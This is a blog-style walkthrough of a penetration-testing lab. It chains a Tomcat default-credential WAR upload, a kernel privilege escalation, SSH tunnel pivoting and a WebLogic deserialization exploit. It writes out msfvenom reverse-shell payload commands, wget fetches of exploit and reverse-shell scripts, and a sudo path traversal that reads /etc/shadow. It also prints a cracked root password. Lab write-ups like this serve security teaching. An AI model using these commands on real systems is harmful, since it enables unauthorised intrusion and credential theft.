PT Exercise

August 31, 2017 Leave a comment

Lab:

Lab.PNG

Reconnaissance

Let’s start the fun by doing an nmap scan on our Victim machine 192.168.1.8

NmapScan.png

we found multiple services running including apache, netbios ,nfs share and Tomcat. When ever i find tomcat , i always think of Tomcat Default Credential and uploading war file exploit.

Exploit Scenario

first i tried to visit http://192.168.1.8:8080/manager and try tomcat:tomcat credentials and i could connect to the manager interface

ConnectTo Manager.png

next i created a war file payload using msfvenom to get a reverse shell that connects to my attacker machine 192.168.1.13 on port 4443 on the server and named the file webshell.war

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.13 LPORT=4443 -f war > webshell.war

MSFVenomOut.png

Next we have to get the name of the jsp file to execute, we can use jar -tf webshell.war

GetJSP.png

next we have to listen on port 4443 and then execute

wget 192.168.1.8:8080/webshell/umrvzbycqupfmbi.jsp or visit the url from our browser.

and we will get a shell on our first victim with user tomcat7TomCatRCE.png

Privilege Escalation

once i get a shell and want to do privilege escalation i always check what commands i can execute with sudo as a root.sudo Command 1st Machine.png

unfortunately i can’t execute any commands using sudo. let’s try to check the version using uname -v

uname Version.png

Doing some Google foo you can find that it’s vulnerable to privilege escalation exploit so we can get exploit from internet 39166.c

first i have to get the exploit code to the victim machine so i ran a python http server using command python -m SimpleHTTPServer which will run on port 8000, and the run wget from our reverse shell connection to get the code and put it inside /tmp

GetExploitToTmp.png

finally we compile the code and run the exploit and voila we got a root shell shell.

ExecuteShell.png

Pivoting

first let’s try to run ifconfig to check if our victim is connected to another network.

ifconfig.png

we can find that it has another IP 192.168.152.143, now we have to find a way to use this machine as a pivot and connect to the other network, reading an article from how Hacking got hacked i remembered a technique to do this using ssh dynamic tunneling and proxychains

so first i started the ssh daemon as from nmap results there was no ssh running and also i  changed the root password in order to be able to establish an ssh session.

Starting SSH.png

next i did the below command which create what is called a dynamic tunnel using -D option.

ssh -D 9090 root@192.168.1.8

SSH Dynamic Tunneling Command.png

Once the ssh session is started the tunnel is up on port 9090. so next let’s configure proxychains to use this portProxyChainsConf.png

and we can run proxychains before any command while we are trying to connect to any ip in 192.168.152.0/24 subnet.

next we can run our nmap ping sweep using proxychains , so proxychains will utilize the ssh tunnel created on port 9090 to reach the 192.168.152.0/24 subnet. so by executing sudo proxychains nmap -Pn 192.168.152.0/24

Ping Sweep.png

by excluding 192.168.152.1 and 192.167.152.254(VM Specific IP’s) we can conclude that our next victim will be 192.168.152.141

let’s nmap this host using proxychainsNmap using ProxyChains 2nd Machine.png

we found two ports open, first i wanted to browse to port 7001 using my browser, unfortunately proxychains can’t do that. so the solution was to create a Local SSH Tunnel to be able to connect to port 7001, so doing ssh -L 7000:192.168.152.141:7001 root@192.168.1.8 means that we can connect to localhost 7000 and the traffic will be tunneled to our victim 192.168.152.141 port 7001.

LocalTunnel2.png

next from browser we can visit http://localhost:7000 and we can find it’s oracle weblogic.

BrowseWebLogic.png

Weblogic is an oracle application Middleware which is usually used to connect applications with each others using servlets and other techniques.

doing some google foo we can find that it’s vulnerable to java deserialization Exploit which can lead to RCE.

i found many topics on how to exploit java deserialization vulnerabilities in oracle weblogic including this.

The only challenge was how to get a reverse shell from the other victim 192.168.152.141 while it’s not in our network.

again we can use SSH Tunneling but this time Remote SSH Tunneling.

we need a remote tunnel which will be used to connect back to our Linux Mint Attacker Machine 192.168.1.13 on port 4444

so first we created our exploit bash reverseshell script, the below script when executed will make a reverse shell connection to our first victim 192.168.152.143 on port 8888BashReverseCode.png

so we have to create a remote tunnel that forwards all requests to 8888 to 4444 on our machine. ssh -R 0.0.0.0:8888:192.168.1.13:4444 root@192.168.1.8

this command once ssh connection is established between attacker machine and 1st victim machine will create a listener on the 1st Victim machine on port 8888 , any connection to this port will get forwarded to attacker machine on port 4444

TunnelToBashShell.png

but now how can we get this bash script to the vulnerable weblogic server. the solution is to host it on our python SimpleHTTPServer on port 8000 and create another remote tunnel to my webserver using

ssh -R 0.0.0.0:8001:192.168.1.13:8000 root@192.168.1.8TunnelToGetBashShell Code.png

so let’s now exploit the Weblogic java deserialization vulnerability.

let’s use the exploit code from This blog

python weblogic.py [Victim Machine and port] [location of ysoserial tool which generate java payloads] [command to execute]

python weblogic.py localhost  7000 ../ysoserial-0.0.2-all.jar ‘wget http://192.168.152.143:8001/BashReverseShell.sh’

so connecting to 192.168.152.143:8001 will basically connect to our machine on port 8000 which is the python HTTP Webserver

WebLogicExploitGetBash Code.png

and from webserver python logs we can find that a GET request is there to get the bash file which means that our exploit is succeeding , the only thing missing is to execute the script.

WebServerLogs.png

so now let’s run the exploit code , which will get a reverse connection to 192.168.152.141:8888 which will be tunneled to 192.168.1.13:4444 using the command

ssh -R 0.0.0.0:8888:192.168.1.13:4444 root@192.168.1.8

and also we have to create our listener on port 4444

finally when we executes python weblogic.py localhost  7000 ../ysoserial-0.0.2-all.jar ‘sh BashReverseShell.sh’  and we will get ourselves a shell.

listner and shell.png

Miss configuration to root

as always when get a shell i try to find which commands i can run as root using sudo.

Sudo 2nd Machine.png

i can find that i can run /bin/cat /root/backup/*

great that is a miss configuration which we can take advantage of. we can use sudo to cat /root/backup and then go Two directories back and basically cat any file we want in root.

so let’s cat the shadow file using

sudo /bin/cat /root/backup../../etc/shadow

GetRootHash.png

and finally I cracked the root password using John the ripper which was mario101Cracked.png

Thanks hope you enjoyed reading

 

 

 

Leave a Reply

Your email address will not be published. Required fields are marked *